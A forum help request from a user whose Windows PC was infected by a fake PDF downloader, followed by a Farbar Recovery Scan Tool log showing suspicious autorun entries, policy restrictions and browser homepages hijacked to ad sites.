HI ...
yesterday i downloaded a program(it was a downloader for a pdf file) and after running it ... my internet explorer keeps opening with random ad sites ... and i can't run or install any antivirus .. it says "the requested resource is in use" ... i tried downloading some antiviruses like Malwarebytes but error won't let me install it even in safe mode .. i just scanned my pc with FRST and it created 2 log files .. i will post them down ... please help..
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 23-04-2017 01
Ran by Mehrad (administrator) on YUKIHA (24-04-2017 18:53:09)
Running from C:\Users\Mehrad\Downloads\Programs\New folder
Loaded Profiles: Mehrad (Available Profiles: Mehrad)
Platform: Windows 8.1 Pro (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
() C:\Windows\System32\tprdpw32.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe
() C:\Program Files (x86)\Realtek\Realtek Bluetooth\BTDevMgr.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Foxit Software Inc.) C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe
(AnchorFree Inc.) C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
() D:\Program Files\Autodesk\3ds Max 2014\NVIDIA\Satellite\raysat_3dsmax2014_64server.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(arvato digital services llc) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(@ByELDI) C:\Program Files\KMSpico\Service_KMS.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Smith Micro Software, Inc.) C:\Program Files (x86)\Smith Micro\StuffIt 12.0.1\ArcNameService.exe
() C:\Genius\ioTablet\TabletService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
() C:\Genius\ioTablet\gTabletTask.exe
(Tweaking.com) C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)\WR_Tray_Icon.exe
(Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.2.0.5\WsAppService.exe
(Telegram Messenger LLP) C:\Users\Mehrad\AppData\Roaming\Telegram Desktop\Telegram.exe
(Sony) C:\Program Files\Sony\Xperia Companion\Service\XperiaCompanionService.exe
() C:\Program Files (x86)\Zapya-en\ZapyaService.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-Service.exe
(WIBU-SYSTEMS AG) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
(BlueStack Systems) C:\Program Files (x86)\BlueStacks\HD-Network.exe
(BlueStack Systems) C:\Program Files (x86)\BlueStacks\HD-BlockDevice.exe
(BlueStack Systems) C:\Program Files (x86)\BlueStacks\HD-SharedFolder.exe
(Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDIntelligent.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corporation) C:\Program Files (x86)\Realtek\Realtek Bluetooth\BTServer.exe
(Realtek semiconductor) C:\Windows\RTFTrack.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe
(Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\utility.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
() C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
() C:\Users\Mehrad\AppData\Roaming\90504824\145699.exe
() C:\Genius\ioTablet\gTabTaskBar.exe
() C:\Genius\ioTablet\gIoTabletFunMgm.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RtHDVBg_LENOVO_DOLBYDRAGON] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1379544 2014-03-05] (Realtek Semiconductor)
HKLM\...\Run: [BtServer] => C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTServer.exe [216576 2014-03-10] (Realtek Semiconductor Corporation)
HKLM\...\Run: [RtsFT] => C:\Windows\RTFTrack.exe [6340312 2014-06-10] (Realtek semiconductor)
HKLM\...\Run: [Energy Manager] => C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe [16094704 2016-08-10] (Lenovo(beijing) Limited)
HKLM\...\Run: [Lenovo Utility] => C:\Program Files (x86)\Lenovo\Energy Manager\Utility.exe [10841584 2016-08-10] (Lenovo(beijing) Limited)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [287592 2014-03-26] (Intel Corporation)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3743648 2017-03-02] (ELAN Microelectronics Corp.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2234144 2014-01-21] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13667032 2014-02-24] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1379544 2014-03-05] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_LENOVO_MICPKEY] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1379544 2014-03-05] (Realtek Semiconductor)
HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1476288 2017-04-05] (COMODO)
HKLM-x32\...\Run: [VirtualCloneDrive] => C:\Program Files (x86)\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe [88984 2013-03-10] (Elaborate Bytes AG)
HKLM-x32\...\Run: [CloneCDTray] => C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe [57344 2009-01-30] (SlySoft, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [224128 2014-06-16] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-10-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe [843480 2014-12-12] (BlueStack Systems, Inc.)
HKLM-x32\...\Run: [ioTablet] => C:\Genius\ioTablet\gTabTaskBar.exe [47104 2012-03-23] ()
HKLM-x32\...\Run: [IseUI] => C:\Program Files (x86)\COMODO\Internet Security Essentials\vkise.exe [3386576 2017-03-30] (COMODO)
HKLM\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [4019312 2017-03-28] (Tonec Inc.)
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [29494400 2016-07-13] (Skype Technologies S.A.)
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [BitTorrent] => C:\Users\Mehrad\AppData\Roaming\BitTorrent\BitTorrent.exe [1982152 2017-03-26] (BitTorrent Inc.)
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-26] (Piriform Ltd)
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-03-23] (Valve Corporation)
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [mailruhomesearch] => C:\Users\Mehrad\AppData\Local\Mail.Ru\Sputnik\ptls\mailruhomesearch.exe [0 2017-02-11] ()
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [XperiaCompanionAgent] => C:\Program Files (x86)\Sony\Xperia Companion\XperiaCompanionAgent.exe [2097024 2017-02-07] (Sony)
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [Google Update] => C:\Users\Mehrad\AppData\Local\Google\Update\1.3.33.3\GoogleUpdateCore.exe [599632 2017-04-12] (Google Inc.)
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [9YRCG8IAZDB5VO7] => "C:\Program Files\Q6OHZV34LN\KK5OQZTNG.exe"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [5PXT76H95I04F9G] => "C:\Program Files\874VB00CLK\874VB00CL.exe"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Run: [130328] => C:\Users\Mehrad\AppData\Roaming\90504824\145699.exe [5632 2017-04-24] ()
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\CurrentVersion\Windows: [Load] C:\ProgramData\msvmvvrc.exe <===== ATTENTION
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\MountPoints2: {28953375-5eec-11e6-8254-7429af927dee} - "F:\setup.exe"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\MountPoints2: {a16ec483-11ba-11e7-8279-7429af927dee} - "I:\startme.exe"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\MountPoints2: {a8658acb-7762-11e6-825a-7429af927dee} - "H:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\MountPoints2: {cf3bc780-5e84-11e6-824f-806e6f6e6963} - "H:\autorun.exe"
HKLM\...\Providers\a8nezx6l: C:\Program Files (x86)\Phucoing Verfier\local64spl.dll [313344 2017-04-24] ()
ShellExecuteHooks: No Name - {1A8E72D2-235B-11E7-AF32-64006A5CFC23} - C:\Users\Mehrad\AppData\Roaming\Pulelybowey\Placesh.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Mehrad\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Mehrad\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Mehrad\AppData\Local\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc.)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] ()
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Mehrad\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-01] ()
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Mehrad\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-01] ()
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Mehrad\AppData\Local\MEGAsync\ShellExtX32.dll [2016-11-01] ()
Startup: C:\Users\Mehrad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2017-03-31]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Mehrad\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited)
GroupPolicy: Restriction <======= ATTENTION
GroupPolicy\User: Restriction <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{61773cf8-0559-438e-80ee-4a186862ce3f} <======= ATTENTION (Restriction - IP)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{439D960B-747D-4180-B8AF-BDA9F6E2D218}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
HKU\S-1-5-21-4257933716-793472738-408171945-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://n.clickforms.ru/c/1a30e417c259f275?
SearchScopes: HKU\S-1-5-21-4257933716-793472738-408171945-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7B7FE4FC27-A343-4F4B-8746-4F982B41C82E%7D&gp=811041
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2016-12-10] (Internet Download Manager, Tonec Inc.)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre8\bin\ssv.dll [2016-10-07] (Oracle Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre8\bin\jp2ssv.dll [2016-10-07] (Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2016-12-10] (Internet Download Manager, Tonec Inc.)
FireFox:
========
FF DefaultProfile: xyc0yu1p.default
FF ProfilePath: C:\Users\Mehrad\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\xyc0yu1p.default\Profiles\xyc0yu1p.default [not found]
FF ProfilePath: C:\Users\Mehrad\AppData\Roaming\Mozilla\Firefox\Profiles\xyc0yu1p.default [2017-04-24]
FF NewTab: Mozilla\Firefox\Profiles\xyc0yu1p.default -> hxxp://www.initialsite123.com/?z=f540aad629f5d8554c50abag5z3t8cfe1g2w3o3q4z&from=fss&uid=WDCXWD10SPCX-24HWST1_WD-WX61A94693PD693PD&type=hp
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\xyc0yu1p.default -> initialsite123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\xyc0yu1p.default -> initialsite123
FF Homepage: Mozilla\Firefox\Profiles\xyc0yu1p.default -> about:home
FF Extension: (MEGA) - C:\Users\Mehrad\AppData\Roaming\Mozilla\Firefox\Profiles\xyc0yu1p.default\Extensions\
[email protected] [2017-04-16]
FF Extension: (Hotspot Shield Free VPN Proxy – Unblock Sites) - C:\Users\Mehrad\AppData\Roaming\Mozilla\Firefox\Profiles\xyc0yu1p.default\Extensions\
[email protected] [2016-12-05]
FF Extension: (Site Deployment Checker) - C:\Users\Mehrad\AppData\Roaming\Mozilla\Firefox\Profiles\xyc0yu1p.default\features\{4fb3a118-fa5f-4d86-83a1-e93250aa6141}\
[email protected] [2017-03-25]
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-01-26]
FF SearchPlugin: C:\Users\Mehrad\AppData\Roaming\Mozilla\Firefox\Profiles\xyc0yu1p.default\searchplugins\8l56rm3g.xml [2017-04-24]
FF HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\Firefox\Extensions: [
[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\SeaMonkey\Extensions: [
[email protected]] - C:\Users\Mehrad\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Mehrad\AppData\Roaming\IDM\idmmzcc5 [2017-04-01] [not signed]
FF HKU\S-1-5-21-4257933716-793472738-408171945-1001\...\SeaMonkey\Extensions: [
[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-04-01] ()
FF Plugin: @java.com/DTPlugin,version=11.11.2 -> C:\Program Files\Java\jre8\bin\dtplugin\npDeployJava1.dll [2016-10-07] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.11.2 -> C:\Program Files\Java\jre8\bin\plugin2\npjp2.dll [2016-10-07] (Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-12] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-04-01] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-12-29] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-12] (Adobe Systems)
FF Plugin HKU\S-1-5-21-4257933716-793472738-408171945-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Mehrad\AppData\Local\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
FF Plugin HKU\S-1-5-21-4257933716-793472738-408171945-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Mehrad\AppData\Local\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
FF Plugin HKU\S-1-5-21-4257933716-793472738-408171945-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Mehrad\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-08] (Unity Technologies ApS)
Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.initialsite123.com/?z=f540aad629f5d8554c50abag5z3t8cfe1g2w3o3q4z&from=fss&uid=WDCXWD10SPCX-24HWST1_WD-WX61A94693PD693PD&type=hp
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.initialsite123.com/?z=f540aad629f5d8554c50abag5z3t8cfe1g2w3o3q4z&from=fss&uid=WDCXWD10SPCX-24HWST1_WD-WX61A94693PD693PD&type=hp"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.initialsite123.com/search/?q={searchTerms}&z=f540aad629f5d8554c50abag5z3t8cfe1g2w3o3q4z&from=fss&uid=WDCXWD10SPCX-24HWST1_WD-WX61A94693PD693PD&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> 69initialsite123
CHR Profile: C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-04-24] <==== ATTENTION
CHR Extension: (Google Slides) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-10-01]
CHR Extension: (Google Docs) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2016-10-01]
CHR Extension: (Google Drive) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-10-01]
CHR Extension: (YouTube) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-10-01]
CHR Extension: (Домашняя страница Mail.Ru) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ccfifbojenkenpkmnbnndeadpfdiffof [2017-02-11]
CHR Extension: (Good TrueTest) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\cpflnioddbhmlchefkmcmeehjpcpiknp [2017-02-11]
CHR Extension: (Google Sheets) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-10-01]
CHR Extension: (Google Docs Offline) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-01]
CHR Extension: (IDM Integration Module) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2017-04-15]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-14]
CHR Extension: (No Name) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\oelpkepjlgmehajehfeicfbjdiobdkfj [2017-03-03]
CHR Extension: (Mail.Ru) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ojlcebdkbpjdpiligkdbbkdkfjmchbfd [2017-02-11]
CHR Extension: (Gmail) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-10-01]
CHR Extension: (Chrome Media Router) - C:\Users\Mehrad\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-03-28]
CHR HKLM-x32\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-03-28]
CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-12] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-02-27] (Adobe Systems, Incorporated)
R2 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [393728 2014-12-25] (BlueStack Systems, Inc.) [File not signed]
R2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [388824 2014-12-12] (BlueStack Systems, Inc.)
R2 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [786136 2014-12-12] (BlueStack Systems, Inc.)
R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe [92160 2014-03-12] () [File not signed]
S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [10508904 2017-04-05] (COMODO)
S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2876096 2017-04-05] (COMODO)
S2 Dataup; C:\Users\Mehrad\AppData\Local\ntuserlitelist\dataup\dataup.exe [77824 2017-01-05] () [File not signed] <==== ATTENTION
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [135072 2017-03-02] (ELAN Microelectronics Corp.)
R2 FoxitReaderService; C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe [1659592 2016-12-29] (Foxit Software Inc.)
R2 hshld; C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe [2604664 2017-03-01] (AnchorFree Inc.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-03-26] (Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [296432 2014-04-16] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-09-16] (Intel Corporation)
